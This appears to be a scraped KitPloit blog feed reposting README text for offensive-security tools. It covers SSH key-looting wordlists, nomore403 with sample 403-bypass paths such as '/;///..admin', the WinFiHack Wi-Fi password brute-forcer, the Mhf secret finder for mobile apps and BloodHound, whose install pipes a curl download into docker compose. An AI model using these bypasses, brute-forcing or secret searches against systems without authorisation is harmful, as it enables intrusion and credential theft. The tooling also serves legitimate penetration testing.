center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/SSH-Private-Key-Looting-Wordlists" rel="nofollow" target="_blank" title="Download SSH-Private-Key-Looting-Wordlists">Download SSH-Private-Key-Looting-Wordlists</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/ssh-private-key-looting-wordlists.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-84828600686226918902024-03-12T11:22:00.001-07:002024-03-12T11:22:04.114-07:00Nomore403 - Tool To Bypass 403/40X Response Codes<div class="post-body entry-content" id="post-body-5846935525376148964" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/s1233/Nomore403.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1233" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/w640-h218/Nomore403.png" width="640"/></a></div><div class="separator" style="clear: both; text-align: center;"><br/></div> <p><code>nomore403</code> is an innovative tool designed to help <a href="https://www.kitploit.com/search/label/Cybersecurity" rel="nofollow" target="_blank" title="cybersecurity">cybersecurity</a> professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, <code>nomore403</code> automates various <a href="https://www.kitploit.com/search/label/Techniques" rel="nofollow" target="_blank" title="techniques">techniques</a> to seamlessly navigate past these access restrictions, offering a broad range of strategies from header <a href="https://www.kitploit.com/search/label/Manipulation" rel="nofollow" target="_blank" title="manipulation">manipulation</a> to method tampering.</p><span><a name='more'></a></span><div><br/></div><span style="font-size: x-large;"><b>Prerequisites</b></span><br/> <p>Before you install and run <code>nomore403</code>, make sure you have the following: - Go 1.15 or higher installed on your machine.</p> <br/><span style="font-size: x-large;"><b>Installation</b></span><br/> <br/><span style="font-size: large;"><b>From Releases</b></span><br/> <p>Grab the latest release for your OS from our <a href="https://github.com/devploit/nomore403/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page.</p> <br/><span style="font-size: large;"><b>Compile from Source</b></span><br/> <p>If you prefer to compile the tool yourself:</p> <pre><code>git clone https://github.com/devploit/nomore403cd nomore403go getgo build</code></pre> <br/><span style="font-size: x-large;"><b>Customization</b></span><br/> <p>To edit or add new bypasses, modify the payloads directly in the <a href="https://github.com/devploit/nomore403/tree/main/payloads" rel="nofollow" target="_blank" title="payloads">payloads</a> folder. nomore403 will automatically incorporate these changes.</p> <br/><span style="font-size: x-large;"><b>Usage</b></span><br/> <br/><span style="font-size: large;"><b>Output example</b></span><br/> <pre><code> ________ ________ ________ ________ ________ ________ ________ ________ ________ ╱ ╱ ╲╱ ╲╱ ╱ ╲╱ ╲╱ ╲╱ ╲╱ ╱ ╲╱ ╲╱__ ╲ ╱ ╱ ╱ ╱ ╱ ╱ ╱ ╱ ╱ __╱ ╱ ╱ ╱__ ╱ ╱ ╱ ╱ ╱ ╱ _╱ __/____ ╱ ╱ ╱ ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱ ╱____╱╲________╱╲________╱ Target: https://domain.com/adminHeaders: falseProxy: falseUser Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)Method: GETPayloads folder: payloadsCustom bypass IP: falseFollow Redirects: falseRate Limit detection: falseVerbose: false━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━403 429 bytes https://domain.com/admin━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━200 2047 bytes https://domain.com/;///..admin━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━403 429 bytes HTTP/1.0403 429 bytes HTTP/1.1403 429 bytes HTTP/2━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━200 2047 bytes https://domain.com/%61dmin</code></pre> <br/><span style="font-size: large;"><b>Basic Usage</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin</code></pre> <br/><span style="font-size: large;"><b>Verbose Mode + Proxy</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v</code></pre> <br/><span style="font-size: large;"><b>Parse request from Burp</b></span><br/> <pre><code>./nomore403 --request-file request.txt</code></pre> <br/><span style="font-size: large;"><b>Use <a href="https://www.kitploit.com/search/label/Custom%20Header" rel="nofollow" target="_blank" title="custom header">custom header</a> + specific IP address for bypasses</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8</code></pre> <br/><span style="font-size: large;"><b>Set new max of goroutines + add delay between requests</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin -m 10 -d 200</code></pre> <br/><span style="font-size: x-large;"><b>Options</b></span><br/> <pre><code>./nomore403 -hCommand line application that automates different ways to bypass 40X codes.Usage: nomore403 [flags]Flags: -i, --bypass-ip string Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'. -d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms). -f, --folder string Specify the folder location for payloads if not in the same directory as the executable. -H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers. -h, --help help for nomore403 --http Use HTTP instead of HTTPS for requests defined in the request file. -t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'. -m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50) --no-banner Disable the display of the startup banner (default: banner shown). -x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'. --random-agent Enable the use of a randomly selected User-Agent. -l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code. -r, --redirect Automatically follow redirects in responses. --request-file string Load request configuration and flags from a specified file. -u, --uri string Specify the target URL for the request. -a, --user-agent string pecify a custom User-Agent string for requests (default: 'nomore403'). -v, --verbose Enable verbose output for detailed request/response logging.</code></pre> <br/><span style="font-size: x-large;"><b>Contributing</b></span><br/> <p>We welcome contributions of all forms. Here's how you can help:</p> <ul> <li>Report bugs and suggest features.</li> <li>Submit pull requests with bug fixes and new features.</li> </ul> <br/><span style="font-size: x-large;"><b>Security Considerations</b></span><br/> <p>While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.</p> <br/><span style="font-size: x-large;"><b>License</b></span><br/> <p>nomore403 is released under the MIT License. See the <a href="https://github.com/devploit/dontgo403/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br/><span style="font-size: x-large;"><b>Contact</b></span><br/> <p><a href="https://twitter.com/devploit/" rel="nofollow" target="_blank" title="Tool to bypass 403/40X response codes. (10)"><img alt="Tool to bypass 403/40X response codes. (3)" src="https://img.shields.io/badge/-Twitter-blue?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/devploit/"/></a></p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/devploit/nomore403" rel="nofollow" target="_blank" title="Download Nomore403">Download Nomore403</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/nomore403-tool-to-bypass-40340x.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-8328061043885335052024-03-11T09:23:00.001-07:002024-03-11T09:23:06.845-07:00WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies<div class="post-body entry-content" id="post-body-4393216522276329586" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi" rel="nofollow"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640"/></a></p><pre><code></code></pre> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" rel="nofollow" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" rel="nofollow" target="_blank" title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" rel="nofollow" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>Installation</b></span><br/> <p>The packages are minimal or nearly none đŸ˜…. The package install command is:</p> <pre><code>pip install rich pyfiglet</code></pre> <p>Thats it.</p> <br/><span style="font-size: large;"><b>Features</b></span><br/> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em></li> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability</li> <li><em>Code-Wise Features:</em></li> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>versatility in using interface, targets, and password files.</li> </ul> <br/><span style="font-size: large;"><b>How it works</b></span><br/> <p>So this is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" rel="nofollow" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640"/></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-Fi</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> <br/><span style="font-size: large;"><b>How to run this</b></span><br/> <p style="text-align: left;">After installing all the packages just run <code>python main.py</code> rest is <a href="https://www.kitploit.com/search/label/History" rel="nofollow" target="_blank" title="history">history</a> đŸ‘ make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:</p><p style="text-align: center;">  <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi" rel="nofollow"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640"/></a></p> <br/><span style="font-size: large;"><b>Contributions</b></span><br/> <p>For contributions: - <em>First Clone:</em> First Clone the repo into your dev env and do the edits. - <em>Comments:</em> I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - <em>Submit:</em> Submit a PR for me to verify the changes and apprive it if necessary.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/winfihack-windows-wifi-brute-forcing.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-76029654779433764442024-03-09T14:37:00.001-08:002024-03-09T14:37:15.805-08:00Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application<div class="post-body entry-content" id="post-body-812676710718154663" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/s1773/Mhf.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1014" data-original-width="1773" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/w640-h366/Mhf.png" width="640"/></a></div><p><br/></p><p>Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding <a href="https://www.kitploit.com/search/label/Sensitive%20Information" rel="nofollow" target="_blank" title="sensitive information">sensitive information</a> or provides suggestions for working with the identified platform.</p><span><a name='more'></a></span><p><br/></p><span style="font-size: large;"><b>How work?</b></span><br/> <p>The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.</p> <br/><span style="font-size: large;"><b>Example</b></span><br/> <br/><b>Cordova</b><br/> <p>Search files:</p> <pre><code>index.htmlcordova.jscordova_plugins.js</code></pre> <br/><b>React Native Android & iOS</b><br/> <p>Search file</p> <pre><code>Andorid files:libreactnativejni.soindex.android.bundleiOS files:main.jsbundle</code></pre> <br/><span style="font-size: large;"><b>Installation</b></span><br/> <p>❗A minimum of Java 8 is required to run Apktool. </p> <p><code>pip install -r requirements.txt</code></p> <br/><span style="font-size: large;"><b>Usage</b></span><br/> <p><code>python3 mhf.py app.apk|ipa|aab</code></p> <br/><b>Examples</b><br/> <pre><code>python3 mobile_helper_framework.py file.apk[+] App was written in React NativeDo you want analizy the application (y/n) yOutput directory already exists. Skipping decompilation.Beauty the react code? (y/n) nSearch any info? (y/n) y==>>Searching possible internal IPs in the fileresults.........==>>Searching possible emails in the fileresults.........==>>Searching possible interesting words in the fileresults.........==>>Searching Private Keys in the fileresults.........==>>Searching high confidential secretsresults.........==>>Searching possible sensitive URLs in js filesresults.........==>>Searching possible endpoints in js files results.........</code></pre> <br/><span style="font-size: large;"><b>Features</b></span><br/> <p>This tool uses Apktool for decompilation of Android applications.</p> <p>This tool renames the .ipa file of iOS applications to .zip and extracts the contents. </p> <table> <tbody><tr> <th align="center">Feature</th> <th>Note</th> <th align="right">Cordova</th> <th align="right">React Native</th> <th align="right">Native JavaScript</th> <th align="right">Flutter</th> <th align="right">Xamarin</th> </tr> <tr> <td align="center">JavaScript beautifier</td> <td>Use this for the first few occasions to see better results.</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Identifying multiple sensitive information</td> <td>IPs, Private Keys, API Keys, Emails, URLs</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right"></td> </tr> <tr> <td align="center">Cryptographic Functions</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Endpoint extractor</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Automatically detects if the code has been beautified.</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Extracts automatically apk of devices/emulator</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Patching apk</td> <td></td> <td align="right"></td> <td align="right"></td> <td align="right"></td> <td align="right">✅</td> <td align="right"></td> </tr> <tr> <td align="center">Extract an APK from a bundle file.</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> </tr> <tr> <td align="center">Detect if JS files are encrypted</td> <td></td> <td align="right">❌</td> <td align="right"></td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Detect if the resources are compressed.</td> <td></td> <td align="right">❌</td> <td align="right">Hermes✅</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">XALZ✅</td> </tr> <tr> <td align="center">Detect if the app is split</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> </tbody></table> <p><code>What is patching apk:</code> This tool uses Reflutter, a framework that assists with <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" rel="nofollow" target="_blank" title="reverse engineering">reverse engineering</a> of Flutter apps using a patched version of the Flutter library.</p> <p>More information: https://github.com/Impact-I/reFlutter </p><hr/> <p><code>Split APKs</code> is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.</p> <p>Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.</p> <pre><code>adb shell pm path com.packagepackage:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apkpackage:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apkpackage:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apkpackage:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk</code></pre> <p>For example, in Flutter if the application is a Split it's necessary patch split_config.arm64_v8a.apk, this file contains libflutter.so </p> <br/><span style="font-size: large;"><b>Credits</b></span><br/> <ul> <li>This tool use a secrets-patterns-db repositorty created by <a href="https://github.com/mazen160/secrets-patterns-db" rel="nofollow" target="_blank" title="mazen160">mazen160</a></li> <li>This tool use a regular expresion created by <a href="https://github.com/mazen160/https://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py" rel="nofollow" target="_blank" title="Gerben_Javado">Gerben_Javado</a> for extract endpoints</li> <li>This tools use <a href="https://www.kitploit.com/search/label/reFlutter" rel="nofollow" target="_blank" title="reflutter">reflutter</a> for flutter actions </li> </ul> <br/><span style="font-size: large;"><b>Changelog</b></span><br/> <br/><b>0.5</b><br/> <ul> <li>Public release</li> <li>Bug fixes</li> </ul> <br/><b>0.4</b><br/> <ul> <li>Added plugins information in Cordova apps</li> <li>Added Xamarin actions</li> <li>Added NativeScript actions</li> <li>Bug fixes</li> </ul> <br/><b>0.3</b><br/> <ul> <li>Added NativeScript app detection</li> <li>Added signing option when the apk extracted of aab file is not signed</li> </ul> <br/><b>0.2</b><br/> <ul> <li>Fixed issues with commands on Linux.</li> </ul> <br/><b>0.1</b><br/> <ul> <li>Initial version release.</li> </ul> <br/><span style="font-size: large;"><b>License</b></span><br/> <ul> <li>This work is licensed under a Creative Commons Attribution 4.0 International License.</li> </ul> <br/><span style="font-size: large;"><b>Autors</b></span><br/> <p><a href="https://twitter.com/__stux" rel="nofollow" target="_blank" title="Cesar Calderon">Cesar Calderon</a> <a href="https://websec.mx/" rel="nofollow" target="_blank" title="Marco Almaguer">Marco Almaguer</a></p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/stuxctf/mhf" rel="nofollow" target="_blank" title="Download Mhf">Download Mhf</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/mhf-mobile-helper-framework-tool-that.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-36560992193084702332024-03-08T09:18:00.001-08:002024-03-08T09:18:56.821-08:00BloodHound - Six Degrees Of Domain Admin<div class="post-body entry-content" id="post-body-7786188654903730893" itemprop="articleBody"> <div style="margin:15px"> </div> <p></p><p></p><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio" rel="nofollow"><img alt="" border="0" height="548" id="BLOGGER_PHOTO_ID_7338668270705967650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio=w640-h548" width="640"/></a></p><p align="center"><br/></p> <p>BloodHound is a monolithic web application composed of an embedded React frontend with <a href="https://www.sigmajs.org/" rel="nofollow" target="_blank" title="Sigma.js">Sigma.js</a> and a <a href="https://go.dev/" rel="nofollow" target="_blank" title="Go">Go</a> based REST API backend. It is deployed with a <a href="https://www.postgresql.org/" rel="nofollow" target="_blank" title="Postgresql">Postgresql</a> application database and a <a href="https://neo4j.com/" rel="nofollow" target="_blank" title="Neo4j">Neo4j</a> graph database, and is fed by the <a href="https://github.com/BloodHoundAD/SharpHound" rel="nofollow" target="_blank" title="SharpHound">SharpHound</a> and <a href="https://github.com/BloodHoundAD/AzureHound" rel="nofollow" target="_blank" title="AzureHound">AzureHound</a> data collectors.</p> <p>BloodHound uses <a href="https://www.kitploit.com/search/label/Graph%20Theory" rel="nofollow" target="_blank" title="graph theory">graph theory</a> to reveal the hidden and often unintended relationships within an <a href="https://www.kitploit.com/search/label/Active%20Directory" rel="nofollow" target="_blank" title="Active Directory">Active Directory</a> or Azure environment. Attackers can use <a href="https://www.kitploit.com/search/label/BloodHound" rel="nofollow" target="_blank" title="BloodHound">BloodHound</a> to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</p> <p>BloodHound CE is created and maintained by the <a href="https://bloodhoundenterprise.io" rel="nofollow" target="_blank" title="BloodHound Enterprise Team">BloodHound Enterprise Team</a>. The original BloodHound was created by <a href="https://www.twitter.com/_wald0" rel="nofollow" target="_blank" title="@_wald0">@_wald0</a>, <a href="https://twitter.com/CptJesus" rel="nofollow" target="_blank" title="@CptJesus">@CptJesus</a>, and <a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="@harmj0y">@harmj0y</a>.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>Running BloodHound Community Edition</b></span><br/> <p>The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.</p> <ol> <li>Install Docker Compose and ensure Docker is running. This should be included with the <a href="https://www.docker.com/products/docker-desktop/" rel="nofollow" target="_blank" title="Docker Desktop">Docker Desktop</a> installation</li> <li>Run <code>curl -L https://ghst.ly/getbhce | docker compose -f - up</code></li> <li>Locate the randomly generated password in the terminal output of Docker Compose</li> <li>In a browser, navigate to <code>http://localhost:8080/ui/login</code>. Login with a username of <code>admin</code> and the randomly generated password from the logs</li> </ol> <p>NOTE: going forward, the default <code>docker-compose.yml</code> example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in <a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="examples/docker-compose/README.md">examples/docker-compose/README.md</a> to configure the host binding for the container.</p> <br/><span style="font-size: large;"><b>Installation Error Handling</b></span><br/> <ul> <li>If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry. </li> </ul> <p align="center"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP" rel="nofollow"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7338668301600612402" src="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP=s320"/></a> </p> <ul> <li>If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.</li> </ul> <pre><code># Verify if Docker Engine is Runningdocker info# Attempt to stop Neo4j Service if running (on Windows)Stop-Service "Neo4j" -ErrorAction SilentlyContinue</code></pre> <ul> <li>A successful installation of BloodHound CE would look like the below:</li> </ul> <p>https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9</p> <br/><span style="font-size: large;"><b>Useful Links</b></span><br/> 